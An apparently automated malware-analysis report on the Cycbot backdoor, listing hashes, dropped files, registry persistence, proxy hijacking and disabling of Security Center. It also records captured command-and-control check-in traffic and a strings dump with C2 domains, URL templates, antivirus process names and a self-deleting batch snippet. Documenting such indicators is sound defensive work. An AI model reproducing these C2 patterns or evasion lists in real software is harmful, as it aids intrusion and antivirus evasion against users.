Backdoor.Cycbot.BJ_59da5cbd6c

by malwarelabrobot on August 31st, 2014 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Backdoor.Cycbot.BJ (B) (Emsisoft), Backdoor.Cycbot.BJ (AdAware), Trojan.Win32.Alureon.FD, Trojan.Win32.Swrort.3.FD, BackdoorCycbot.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 59da5cbd6ce2546e0dbfbe9bb7966181
SHA1: fee98472b4e2dea0ec071d13731f445242099793
SHA256: e0c749ea8227235ae4cf74efe8a5b0ab0653e899142fceb7bfdabe9f95e36757
SSDeep: 6144:X5RqbL3H qcEDlCC/R4eClAZ8RoXzz5c/SKud:XjqbzeGlD/yerZRf5cW
Size: 285184 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2005-09-16 16:15:08
Analyzed on: WindowsXP SP3 32-bit


Summary:

Backdoor. Malware that enables a remote control of victim's machine.

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

%original file name%.exe:1176
%original file name%.exe:352

The Backdoor injects its code into the following process(es):

6.tmp:1676
%original file name%.exe:1156

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1156 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%System%\config\SOFTWARE.LOG (3302 bytes)
%System%\config\software (1164 bytes)
%Program Files%\LP\5AD5\5.exe (43 bytes)
%Program Files%\LP\5AD5\6.tmp (12588 bytes)
%Program Files%\LP\5AD5\C29.exe (273074 bytes)
%Documents and Settings%\%current user%\Application Data\507CF\F2C6.07C (5052 bytes)
%Program Files%\LP\5AD5\7.exe (43 bytes)

The Backdoor deletes the following file(s):

%Program Files%\LP\5AD5\5.exe (0 bytes)
%Program Files%\LP\5AD5\7.exe (0 bytes)

Registry activity

The process 6.tmp:1676 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C 8A EB 5B 27 E0 FB C4 39 9D 28 66 9F 82 66 79"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\WinRAR]
"HWID" = "7B 38 45 33 30 39 35 33 31 2D 30 35 37 37 2D 34"

The process %original file name%.exe:1176 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 8C 30 BE 70 3C 7A A8 8F 11 6E 84 44 D3 94 3B"

The process %original file name%.exe:1156 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 03 00 00 00 14 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:51495"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 53 C0 98 D4 47 3C FE 61 74 F1 59 3C 3C C2 6B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 14 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"C29.exe" = "%Program Files%\LP\5AD5\C29.exe"

Automatic startup of the following service is disabled:

[HKLM\System\CurrentControlSet\Services\wscsvc]
"Start" = "3"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyOverride"

The process %original file name%.exe:352 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 69 75 E4 C6 DC 07 14 72 E4 CB B1 E1 84 3A 34"

Dropped PE files

MD5 File path
ac9682380b3c94ffe32d0aca1a53d53e c:\Program Files\LP\5AD5\6.tmp

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 278679 139776 5.19431 54001527511240c7b1f3044679d00564
.rdata 286720 1940 2048 3.80313 ed337eecf10d6060110360dac5269e34
.data 290816 141675 141824 5.5331 cad23bfafc99f9202dcf75e5f6bacc7c
.rsrc 434176 4096 512 0.723094 e37d5e5560d719339bd622e17bab6907

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
13b9fc08d30c74bb6e2334169e9ceaf5

URLs

URL IP
hxxp://a26.d.akamai.net.0.1.cn.akamaitech.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt
hxxp://e6845.ce.akamaiedge.net/pca3.crl
hxxp://e6845.ce.akamaiedge.net/CSC3-2009-2.crl
hxxp://e6845.ce.akamaiedge.net/pca3-g2.crl
hxxp://e6845.ce.akamaiedge.net/CSC3-2009.crl
hxxp://classicbattletech.com/lhous5.gif?pr=gJ4WK/SUh/TNhRMw9YLJ+MSTUivqg4b0xZJQK+/bxWq1SfkIYQAE 67.192.254.201
hxxp://yoj2iy3a.regfeedbackaccess.com/logo.png?tq=gL5HtzoYwLzEpUb5fU3HxcW3D/A6EsazybMRtyFZ0umG8Ar0SsSA/gSoSEU=&pr=836 141.8.225.80
hxxp://yoj2iy3a.regfeedbackaccess.com/logo.png?tq=gKZEtzoYwLzEvUb5dQzRsrCqA/woTca3l74EgC5OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU=&pr=839 141.8.225.80
hxxp://yoj2iy3a.regfeedbackaccess.com/logo.png?tq=gKZEtzoYwLzEvUb5dQzRsrCqA/woTca3l74EgC9OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU=&pr=409 141.8.225.80
hxxp://TRANSERSDATAFORME.COM/gate.php
hxxp://7q3zhisyxy.givishoolstome.com/logo.png?tq=gKZEtzoYwLzEvUb5dQzRsrCqA/woTca3l74EgC5OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU=&pr=839 141.8.225.80
hxxp://csc3-2009-crl.verisign.com/CSC3-2009.crl 23.7.69.163
hxxp://-54pshy8.regfeedbackaccess.com/logo.png?tq=gKZEtzoYwLzEvUb5dQzRsrCqA/woTca3l74EgC9OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU=&pr=409 141.8.225.80
hxxp://crl.verisign.com/pca3.crl 23.7.69.163
hxxp://crl.verisign.com/pca3-g2.crl 23.7.69.163
hxxp://csc3-2009-2-crl.verisign.com/CSC3-2009-2.crl 23.7.69.163
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt 205.237.69.74
transersdataforme.com 192.155.89.148


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Kazy/Kryptor/Cycbot Trojan Checkin 2
ET TROJAN Bifrose/Cycbot Checkin 2
ET TROJAN Trojan Generic - POST To gate.php with no referer
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.
ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System
ET TROJAN Win32.Fareit.A/Pony Downloader Checkin

Traffic

GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT
Accept-Ranges: bytes
ETag: "806f4cbb43dcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Date: Sat, 30 Aug 2014 08:10:13 GMT
Connection: keep-alive
X-CCC: CL
X-CID: 2
1401CF3DB40B609892HTTP/1.1 200 OK..Content-Type: text/plain..Last-Modi
fied: Wed, 12 Mar 2014 05:29:31 GMT..Accept-Ranges: bytes..ETag: "806f
4cbb43dcf1:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Conte
nt-Length: 18..Date: Sat, 30 Aug 2014 08:10:13 GMT..Connection: keep-a
live..X-CCC: CL..X-CID: 2..1401CF3DB40B609892..



GET /logo.png?tq=gKZEtzoYwLzEvUb5dQzRsrCqA/woTca3l74EgC5OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU=&pr=839 HTTP/1.0
Connection: close
Host: 7q3zhisyxy.givishoolstome.com
Accept: */*
User-Agent: chrome/9.0


HTTP/1.1 200 OK
Date: Sat, 30 Aug 2014 08:10:30 GMT
Server: Apache
Set-Cookie: gvc=917vr1569318310912926; expires=Thu, 29-Aug-2019 08:10:31 GMT; path=/; domain=7q3zhisyxy.givishoolstome.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 51
Keep-Alive: timeout=5, max=121
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<html><head></head><body><!-- vbe --><
;/body></html>..



GET /CSC3-2009-2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2009-2-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "18b70de386686a050c0518cdb3d23240:1409346311"
Last-Modified: Fri, 29 Aug 2014 21:05:11 GMT
Date: Sat, 30 Aug 2014 08:10:14 GMT
Transfer-Encoding:  chunked
Connection: keep-alive
Connection: Transfer-Encoding
Content-Type: application/pkix-crl
00006000..0...0......0...*.H........0..1.0...U....US1.0...U....VeriSig
n, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at htt
ps://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Code Signin
g 2009-2 CA..140829210002Z..140912210002Z0...0!.....V..t..'.F(z....121
202220203Z0!.... .;...9.7.......090826054212Z0!...\.)../F..^p..s...100
722072726Z0!......P....A.x......100708154305Z0!.......O#.`n.5j.9...100
930040708Z0!..../..8~p...h......091006052837Z0!.....(../L....--aK..091
029040207Z0!...aW.....B.!.0..t..090909121104Z0!...g,..4(vv....mJ_..100
514054218Z0!.....V.....(..-..p..090826162211Z0!....O..,J.N.n...Ly..091
[email protected]!.........}..Dt...!..090
922192227Z0!.......2l....7i..?..101109030426Z0!.....p%...l,AogP....100
523060224Z0!...,.P.C......*.....100303082219Z0!...NRPL.............100
413090225Z0!....1w....d.&..8....091026111702Z0!......F....e........090
608081352Z0!.....6..d6.7..4.....100924123027Z0!....$..*...s..&s....100
219210742Z0!......Q_.G..|.......091009145530Z0!........>..O...=72..
100616160934Z0!....Xlm$|".su.......090619194406Z0!......J)..E......C..
100922142243Z0!...D......u.y.Iy{k..101026130323Z0!...El...)>..W..&l
t;K...101004225456Z0!...p..wy.i.zc...X...091117001921Z0!.....,{..^....
......091203194409Z0!....B....d...*[email protected]!.......m. .V..
...~..101111134216Z0!...2.R.i.{..........091029071123Z0!...`F..q2..O.:
......100602074221Z0!...a{.-...@...'.....100723194022Z0!........fW.y.,
s.....101011182226Z0!....Um..}.8)........100324085953Z0!....,u.box
<<< skipped >>>


GET /lhous5.gif?pr=gJ4WK/SUh/TNhRMw9YLJ+MSTUivqg4b0xZJQK+/bxWq1SfkIYQAE HTTP/1.0
Connection: close
Host: classicbattletech.com
Accept: */*
User-Agent: chrome/9.0


HTTP/1.1 301 Moved Permanently
Date: Sat, 30 Aug 2014 08:10:20 GMT
Server: Apache
Location: hXXp://bg.battletech.com/lhous5.gif?pr=gJ4WK/SUh/TNhRMw9YLJ+MSTUivqg4b0xZJQK+/bxWq1SfkIYQAE
Content-Length: 380
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://bg.battletech.com/lhous5.gif?pr=g
J4WK/SUh/TNhRMw9YLJ+MSTUivqg4b0xZJQK+/bxWq1SfkIYQAE">here
</a>.</p>.<hr>.<address>Apache Server at class
icbattletech.com Port 80</address>.</body></html>...



GET /CSC3-2009.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2009-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "2d9580d3f7283921f83a9e9fae6ecce3:1409346312"
Last-Modified: Fri, 29 Aug 2014 21:05:12 GMT
Date: Sat, 30 Aug 2014 08:10:18 GMT
Content-Length: 2249
Connection: keep-alive
Content-Type: application/pkix-crl
0...0......0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0
...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.v
erisign.com/rpa (c)091.0,..U...%VeriSign Class 3 Code Signing 2009 CA.
.140829210003Z..140912210003Z0...0!.....zOR.D...,oMa...090525061903Z0!
......t.o=(..(..G...090520231844Z0!... ....M...m.Q.&...090517075442Z0!
...T.Ay(..U...:_|...090608072333Z0!... .(.....F..9.....090805090059Z0!
.......P..._}..;.x..090714150126Z0!.....5=.qOV[.cyg.&..090528172131Z0!
...K...=$.6.........090521015930Z0!...-H...D...tDXUN...090527062050Z0!
.......-.'@..<B{....090525110212Z0!......x..m*[.7.h#"..090702070220
Z0!.....%.o.....kT.....090527062152Z0!..!.*;....)..Ef..k..090529084018
Z0!..#.}h..."..........090527050204Z0!..$.I^./@.:7.p.,v...090521201736
Z0!..&.5{.....Q;D......090521184343Z0!..&...T[.~y.........090903081104
Z0!...q..m...G..i^.....090521025017Z0!../a.nS..[lA.lCB....090527045238
Z0!..0.....R..iX.px....090605052910Z0!..2.h..).n......p;..090713144756
Z0!..:.............. ..090605052934Z0!..;.0.*.v..*....P...090601001940
Z0!..?..}p 2I..o.\[email protected]`......l..090527022214
Z0!..B..h~a..]..L.2....100512125735Z0!..B.U..ZF...........090527041620
Z0!..F'....?xxnx.6Q....090528003453Z0!..F|A..r....#.@.&...090527062259
Z0!..L.r....F..^..i.t..090608130549Z0!..Q...Y...Exm.._7...090520225737
Z0!..TH..~.. ..({......090723115618Z0!..U.59Z..[.G.RmyR1..090527071534
Z0!..V ].h.../".V<8-...090611075746Z0!..gHT...j5zdG....K..090521205
535Z0!..mje.......;.......090521012215Z0!..p^..E.{.>.........09
<<< skipped >>>


GET /logo.png?tq=gL5HtzoYwLzEpUb5fU3HxcW3D/A6EsazybMRtyFZ0umG8Ar0SsSA/gSoSEU=&pr=836 HTTP/1.1
Host: yoj2iy3a.regfeedbackaccess.com
User-Agent: chrome/9.0
Connection: close


HTTP/1.1 200 OK
Date: Sat, 30 Aug 2014 08:10:21 GMT
Server: Apache
Set-Cookie: gvc=904vr1569318212805841; expires=Thu, 29-Aug-2019 08:10:21 GMT; path=/; domain=yoj2iy3a.regfeedbackaccess.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 51
Keep-Alive: timeout=5, max=123
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<html><head></head><body><!-- vbe --><
;/body></html>..



GET /pca3.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "6eb6550a090577f2ae45953ce2c8a47b:1403747414"
Last-Modified: Thu, 26 Jun 2014 01:50:14 GMT
Accept-Ranges: bytes
Content-Length: 933
Date: Sat, 30 Aug 2014 08:10:13 GMT
Connection: keep-alive
Content-Type: application/pkix-crl
0...0...0...*.H........0_1.0...U....US1.0...U....VeriSign, Inc.1705..U
....Class 3 Public Primary Certification Authority..140617000000Z..140
930235959Z0..x0!...v....a_>..2......020924164823Z0!.....A.....{2..Y
.#..140129175709Z0!...,.|.|...<...j ...080605174907Z0!...`y..q.....
..fh...020923171400Z0!...?A....a.nF`.P....020923171548Z0!............R
.e.53..010207212458Z0!..!......Y...ISi....010706171411Z0!..$-..I{r....
u<._...080403172226Z0!..&.."?..y..51}..1..010706172118Z0!..4....2..
..{W......080605175030Z0!..B....c............070411175910Z0!..H.Py...N
....* [email protected]!..Y......w
`G........070411175657Z0!..Z`[email protected].*q..080403172017Z0!..l....I..
.Y..] .c..010706171749Z0"......T=deQ...1u.]...010207212247Z0".....p..1
..7<.....e..010207211822Z0...*.H............N...wS...d.....f..8j...
...).-..z.^...F..K.(|.4Wa&?.....GQ...59Wg%[email protected]......
..C. .....4Shn...#.....\q...(...#5 HTTP/1.1 200 OK..Server: Apache..ET
ag: "6eb6550a090577f2ae45953ce2c8a47b:1403747414"..Last-Modified: Thu,
 26 Jun 2014 01:50:14 GMT..Accept-Ranges: bytes..Content-Length: 933..
Date: Sat, 30 Aug 2014 08:10:13 GMT..Connection: keep-alive..Content-T
ype: application/pkix-crl..0...0...0...*.H........0_1.0...U....US1.0..
.U....VeriSign, Inc.1705..U....Class 3 Public Primary Certification Au
thority..140617000000Z..140930235959Z0..x0!...v....a_>..2......0209
24164823Z0!.....A.....{2..Y.#..140129175709Z0!...,.|.|...<...j ...0
80605174907Z0!...`y..q.......fh...020923171400Z0!...?A....a.nF`.P.
<<< skipped >>>

GET /pca3-g2.crl HTTP/1.1


Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "5722759b9289b36163a5ef7a94def647:1403746213"
Last-Modified: Thu, 26 Jun 2014 01:30:13 GMT
Accept-Ranges: bytes
Content-Length: 1415
Date: Sat, 30 Aug 2014 08:10:18 GMT
Connection: keep-alive
Content-Type: application/pkix-crl
0...0...0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1<0
:..U...3Class 3 Public Primary Certification Authority - G21:08..U...1
(c) 1998 VeriSign, Inc. - For authorized use only1.0...U....VeriSign T
rust Network..140617000000Z..140930235959Z0...0!...=...X.FL...3..I..08
0403173458Z0!...SJs|.."E.G.......070412172616Z0!....E........W6.n...14
0129192923Z0!.......jvO..!....]..040401180422Z0!......\*....bO-.....08
0403173459Z0!....I..:.<....9..m..070412172523Z0!.........R.E!..=t..
.070522172634Z0!....}.....}.}.(q.C..040401180606Z0!...`.6..,...u.~x.:.
.080403173459Z0!.........wX.....~...080606171636Z0!..$.Jn>.t..d_j..
."..040401180518Z0!.. ..N*(.}H..j......070412172308Z0!.. ..3.J......d.
.9..070522172711Z0!..50.h.:....s.K"....040401180542Z0!..7_f...s.......
....080403173459Z0!..<.J..y..)..~x7.e..080606171735Z0!..NS.c.f.....
.7.p...070412172213Z0!..N.k;..-...9J..-...070522172748Z0!..Q..2pRv.WC.
:..f...030109181346Z0!..Tq..m..*..........140129192925Z0!..^..CX4.3...
 F.R...070522172548Z0!..^..)..P3...7...L..080403173459Z0!..e........O.
^.S....080403173457Z0!..jP....Wv..[.v.5H..070412172102Z0!..nk.l.!y.~..
[email protected]!..r.q.I-Ln./........080403173458Z0!..t8....D....
.......080606171524Z0!..t.xn.tS....O_.....070412171951Z0!..v......Qnw.
.W.g...140129192921Z0...*.H............-.../)a)....K..^..o..(......Z.{
b<n.........d..\%.|._"~.Nm..f..[n.0.`.....7.z....G.%I.>N...T.{..
.k...G.,#.Z.v~a&.......y.....}.....
<<< skipped >>>


GET /logo.png?tq=gKZEtzoYwLzEvUb5dQzRsrCqA/woTca3l74EgC9OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU=&pr=409 HTTP/1.0
Connection: close
Host: -54pshy8.regfeedbackaccess.com
Accept: */*
User-Agent: chrome/9.0


HTTP/1.1 200 OK
Date: Sat, 30 Aug 2014 08:10:41 GMT
Server: Apache
Set-Cookie: gvc=917vr1569318419902862; expires=Thu, 29-Aug-2019 08:10:41 GMT; path=/; domain=-54pshy8.regfeedbackaccess.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 51
Keep-Alive: timeout=5, max=121
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<html><head></head><body><!-- vbe --><
;/body></html>..

The Backdoor connects to the servers at the folowing location(s):

%original file name%.exe_1156:

`.rsrc
PSSh$
SSShkU@
SSSh!
SSj%S
jHh8%D
<%u,V
<3%u1f
GetProcessWindowStation
operator
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
inflate 1.2.5 Copyright 1995-2010 Mark Adler
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
\sc.exe
ntdll.dll
iexplore.exe
opera.exe
firefox.exe
safari.exe
chrome.exe
AVGIDSMonitor.exe
AVGIDSAgent.exe
avgchsvx.exe
avgemcx.exe
avgnsx.exe
avgrsx.exe
avgtray.exe
avgwdsvc.exe
avgnt.exe
ccsvchst.exe
AvastUI.exe
mcagent.exe
SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
SOFTWARE\Microsoft\Windows Defender
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
explorer.exe
Windows Security Center
%s\shell32.dll,Control_RunDLL "%s\wscui.cpl",Security Center
rundll32.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows Defender
at %d:%d "%s" %s
win32iexplore.exe
win32opera.exe
win32firefox.exe
win32safari.exe
win32winword.exe
win32excel.exe
win32outlook.exe
win32photoshop.exe
win32wmplayer.exe
win32java.exe
win32itunes.exe
win32msmsgs.exe
java.exe
*.log
%s:\windows\system32\%s.tmp
%s:\windows\syswow64\%s.tmp
%s:\WINNT\system32\%s.tmp
%s:\WINNT\syswow64\%s.tmp
Find Temporary files is %d
cannot open files %s, Open next files ?
{A1D429DE-B782-4253-84AD-6E09A8438AD5}
\Windows NT
Software\Microsoft\Windows\CurrentVersion\Run
%s\%s
%s.%s
stor.cfg
exec%s
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
lvvm.exe
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
Advapi32.dll
%s%s_1
%s_0_%d_%s
%s_%d
%s_%d_%d_%d_%d
%s_%s
hXXp://zonedg.com/index.html
type=%s&system=na&id=%s&status=%s
t=st&q=%s
%s?tq=%s
id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=112
%s_%s_%d
_1_%d
_2_%d
_3_%d
_4_%d
renamesys5.com
givishoolstome.com
limfoklubs.com
regfeedbackaccess.com
umbrella-systems1.com
monymouses.com
onlinepdahelpforyou.com
remarkreddomas.com
transfersakkonline.com
backupdomaintolevel.com
SELECT_RESERV_SRV_%d
hXXp://%s.%s
%s_%d_%s
id=%s&c=%d
%s_%d_%d_%d
%s_%d_%d
%s %s
%s start%s%c%s
c1.exe
c2.exe
c3.exe
DWN_CON_STRP_%d_%s
hXXp://
hXXp://%d.ctrl.%s
logo.png
img/135.png
img/136.png
t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d
t=%s&q=&s=%d&hrs=%d
%s/%s?tq=%s&pr=%d
%s:%d/%s?tq=%s&pr=%d
hXXp://armoredlegion.com/305986.png
hXXp://armoredlegion.com/16354.png
hXXp://armoredlegion.com/716354_m61.png
hXXp://mektek.net/thelab/wiley.jpg
hXXp://knowledgesutra.com/img/temp/hi.cgi
hXXp://knowledgesutra.com/img/temp/head.png
hXXp://battleon.com/134.gif
hXXp://battleon.com/132.gif
hXXp://battleon.com/133.gif
hXXp://browsermmorpg.com/images/cpc.png
hXXp://browsermmorpg.com/images/cpc2.png
hXXp://browsermmorpg.com/img/intel.gif
hXXp://browsermmorpg.com/img/intel.jpg
hXXp://012webpages.com/christian12.jpg
hXXp://012webpages.com/christian13.jpg
hXXp://012webpages.com/christian14.jpg
hXXp://tri-countymech.com/g/livechat.png
hXXp://tri-countymech.com/g/logo.png
hXXp://tri-countymech.com/g/133.jpg
hXXp://tri-countymech.com/g/134.jpg
hXXp://electronicstheory.com/pics/valley.png
hXXp://electronicstheory.com/pics/sun.png
hXXp://classicbattletech.com/lhous3.gif
hXXp://classicbattletech.com/lhous4.gif
hXXp://classicbattletech.com/lhous5.gif
hXXp://classicbattletech.com/lhous6.gif
hXXp://engineeringcrossing.com/images/misc/23525.png
hXXp://engineeringcrossing.com/images/misc/64646.png
t=t&hrs=%d&q=id=1000&ver=%s&s=%d
t=ip&hrs=%d&q=&s=1
%s?pr=%s
\bl%d_64.bat
del "%s"
if exist "%s" goto a
cmd.exe /c "%s"
%s.zl
GET %s HTTP/1.1
Host: %s
User-Agent: chrome/9.0
POST %s HTTP/1.1
Content-Length: %u
HTTP/1.0 200 OK
HTTP/1.1 200 OK
